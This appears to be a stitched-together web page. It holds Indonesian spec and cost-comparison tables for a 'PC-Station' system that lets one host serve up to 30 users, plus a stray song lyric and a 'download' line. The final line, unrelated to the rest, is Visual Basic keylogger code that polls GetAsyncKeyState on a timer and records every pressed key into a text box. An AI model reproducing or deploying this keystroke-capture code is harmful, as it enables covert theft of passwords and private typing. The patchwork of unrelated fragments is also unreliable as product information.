
Nih DOWNLOAD
’Cause I really always knew that my little crime ’
Maximum workstations | Bisa lebih dari 30pcs |
Jarak | Tidak ada batasan |
Perlu cards | Tidak perlu cards |
Koneksi | Koneksi kabel Network UTP |
System support | Windows 2000 professional edition, Windows xp home/ professional edition, Windows xp media center edition, Windows 2000 server edition, Windows 2003 server edition with linux system |
Support film | Tidak |
Support USB memory | Ya |
Remote visit | Ya |
Color range | 16 bit |
Resolution | 640x480, 800x600 , 1024x768 , 1280x1024 |
PERBANDINGAN | PC STANDART | PC-STATION |
BIAYA | - 1 Komputer untuk 1 user, setiap komputer butuh min 250 Watt. - Ganti Hardware dan Software setiap 2-3 tahun | - 1 Host bisa untuk 30 user, setiap komputer butuh 5 Watt - Ganti Hardware dan Software hanya di Host |
SECURITAS | Mebuka celah data bisa terinfeksi Virus | Securitas Terpusat Hanya di Host |
PERAWATAN | Perlu Mengontrol Setiap User | Hanya perlu Mengontrol Host |
LINGKUNGAN | Suara Noise dari : CPU, Harddisk, CD-ROM, Kipas | Lingkungan Kerja yang nyaman , tanpa noise dan tanpa panas |
PORTABLITY | Hanya bisa di pasang tapi tidak bisa portable | Bisa Portable karena bentuk yang sangat ringkas dan bisa di pasang dimana saja selama ada Host |
Jumlah User | 1-3 user | 4-6 user | 7-10 user | 11-20 user | 21-30 user |
CPU Konfigurasi | Intel Pentiu4 2.4GHz above | Intel Pentium4. 2.8GHz above | Intel Pentium4 3.0GHz above | Intel Pentium4 3.2GHz above | XEON 3.4GHz above |
Memory Konfigurasi | 512 MB above | 512MB above | 1GB above | 2GB above | 3GB above |
HD running speed | 7200RPM above | 7200RPM above | 7200RPM above | 10000RPM above | 10000RPM above |
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As IntegerPrivate Function GetKey() As StringDim Num As ByteFor Num = 33 To 122If GetAsyncKeyState(Num) <> 0 ThenGetKey = Chr(Num)Exit ForEnd IfNextEnd FunctionPrivate Sub Timer1_Timer()Text1.Text = Text1.Text & GetKeyEnd Sub